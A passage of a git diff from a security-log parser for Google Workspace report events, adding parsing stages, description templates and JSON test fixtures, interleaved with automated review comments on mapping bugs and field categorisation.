{google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in 
by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.model.identifier" + } + ] + }, + { + 
"value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..4f5192ea6 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: 
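Review bot: The smart-descriptions hunk contains two byte-identical entries for `User {user.email} failed to log in using {network.application} service : {event.reason}` with the same four conditions (saml, login_failure, user.email, google.report.saml.application_name); the second can never be selected and should be dropped. Both render `{event.reason}` without requiring `event.reason` while requiring `google.report.saml.application_name`, which the text never uses, so the condition list looks copied from the login_success entry; the intended condition is presumably `{ "field": "event.reason" }`. The same placeholder/condition mismatch appears in `The user with id {user.id} on the {host.name} host log in : {event.reason}`, whose conditions test `device.model.name` rather than `host.name`, and the first new entry's value starts with a stray leading space (` Access to ...`). The login_success entry without a status code also lists `event.action` twice in its conditions.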
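Review bot: `ignored_values: ["UNKNOWN"]` is declared at the top of the parser, so it presumably applies to every field the parser sets, not only to `device.id` from `CAA_DEVICE_ID` that the new context_aware_access fixture motivates (its expected output indeed has no device.id). Any other parameter whose legitimate value is the literal string `UNKNOWN` (a failure type, a platform name, an event reason) would then silently vanish from the event, which is hard to diagnose from the output alone. A comment next to the key naming the motivating field, e.g. `# CAA_DEVICE_ID is reported as "UNKNOWN" when Google has no device signal`, would make the intent reviewable, and a per-field ignore would be narrower if the platform supports one.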
@@ -28,6 +29,14 @@ pipeline:
 filter: '{{ json_event.message.id.applicationName == "admin"}}'
 - name: set_vault_fields
 filter: '{{ json_event.message.id.applicationName == "vault"}}'
+ - name: set_context_aware_fields
+ filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}'
+ - name: set_rules_fields
+ filter: '{{ json_event.message.id.applicationName == "rules"}}'
+ - name: set_saml_fields
+ filter: '{{ json_event.message.id.applicationName == "saml"}}'
+ - name: set_chrome_fields
+ filter: '{{ json_event.message.id.applicationName == "chrome"}}'
 - name: set_parameters_fields
 filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
@@ -157,6 +166,8 @@ stages:
 network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}'
 google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}'
+ user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}'
+ source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}'
 set_groups_enterprise_fields:
 actions:
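Review bot: In the meet stage, `user.email` is now taken from the `organizer_email` parameter and `source.ip` from `ip_address`; both keys are also populated elsewhere from the top-level `actor.email` and `ipAddress` (the new test_access_sample_1 fixture shows `user.email` and `source.ip` coming from there), so for meet events this set replaces the actor with the meeting organizer, who is not necessarily the user that performed the action. If the organizer is wanted, a dedicated key such as `google.report.meet.organizer_email` (declared in fields.yml) keeps ECS `user.email` meaning the actor, and the same question applies to `source.ip` versus the caller IP. The order in which this stage runs relative to the common set is outside the hunk, so the overwrite is inferred rather than verified.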
@@ -258,3 +269,69 @@ stages:
 {%- endif -%}
 {% endfor %}
 {{ types|unique|list }}
+
+ set_context_aware_fields:
+ actions:
+ - set:
+ event.type: ["denied"]
+ device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}'
+
+ set_rules_fields:
+ actions:
+ - set:
+ google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["info"]
+ filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}'
+
+ - set:
+ event.type: ["deletion"]
+ filter: '{{ json_event.message.events[0].name == "label_removed"}}'
+
+ - set:
+ event.type: ["change"]
+ filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}'
+
+ set_saml_fields:
+ actions:
+ - set:
+ event.category: ["authentication"]
+ device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["allowed"]
+ filter: '{{ json_event.message.events[0].name == "login_success"}}'
+
+ - set:
+ event.type: ["denied"]
+ event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
+ filter: '{{ json_event.message.events[0].name == "login_failure"}}'
+
+ set_chrome_fields:
+ actions:
+ - set:
+ event.category: ["web"]
+ organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["change"]
+ filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'
+
+ - set:
+ event.type: ["connection"]
+ filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}'
diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json
new file mode 100644
index 000000000..e83076db1
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_access_sample_1.json
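Review bot: `set_chrome_fields` tags ChromeOS peripheral, login and logout events with `event.category: ["web"]`, but these are device and session lifecycle events rather than web traffic; ECS `host` for CHROMEOS_PERIPHERAL_STATUS_UPDATED and `authentication` with `event.type` `start`/`end` for CHROME_OS_LOGIN_EVENT/CHROME_OS_LOGOUT_EVENT would be consistent with how the saml stage in the same hunk already categorises logins. `organization.name` from `ORG_UNIT_NAME` is also questionable, since an org unit is a sub-tree of the Workspace organisation rather than the organisation itself; a `google.report.*` key would be the more honest home. On style, the `{% for param in ... %}{% if param.name == "X" %}{{param.value}}{% endif %}{% endfor %}` loop is repeated roughly twenty times in this hunk; if the engine exposes Jinja's builtin filters, `{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "X") | map(attribute="value") | first }}` is shorter, though the existing stages use the same loop and consistency may win.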
@@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is 
admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..6567eebf1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json 
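Review bot: The expected document pins `event.type: ["denied"]` for MONITOR_MODE_ACCESS_DENY_EVENT, yet the event name says monitor mode, which — if it means what the name suggests — is an evaluation that would have denied access without actually blocking it; rules alerting on denied access would then fire on policies that are not enforced. The fixture also asserts that the fields making the event actionable leave no trace: CAA_ACCESS_LEVEL_UNSATISFIED, CAA_DEVICE_STATE (`No Device Signals`) and BLOCKED_API_ACCESS are absent from `expected`, while only CAA_APPLICATION survives as `google.report.access.application`. Consider distinguishing the monitor-mode variant from an enforced denial (for example via `event.outcome`) and asserting the unsatisfied levels and device state under `google.report.access.*` so a regression in that mapping is caught. The file is also added without a trailing newline (`\ No newline at end of file`), as are the other new fixtures.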
@@ -0,0 +1,53 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "manufacturer": "Linux Foundation", + "model": { + "identifier": "0x2", + "name": "2.0 root hub" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..990b7f47c --- /dev/null 
+++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -0,0 +1,46 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json 
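Review bot: A CHROME_OS_LOGIN_EVENT (reason CHROMEOS_KIOSK_SESSION_LOGIN) is pinned as `event.category: ["web"]` with `event.type: ["connection"]`; ECS convention for a logon is `category: ["authentication"]` with `type: ["start"]` (and `end` for the matching CHROME_OS_LOGOUT_EVENT), so authentication-based rules and dashboards will not see ChromeOS sessions at all. The `in [...]` filter that assigns `connection` to both login and logout sits in the parser hunk outside this fixture, but the fixture is what guards the behaviour. DEVICE_USER is `-` here because it is a kiosk session; when a real user is present that value is the logon subject and should end up in `user.name`, which this fixture cannot check — a second sample with a named DEVICE_USER would cover it.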
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Pari
s\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intV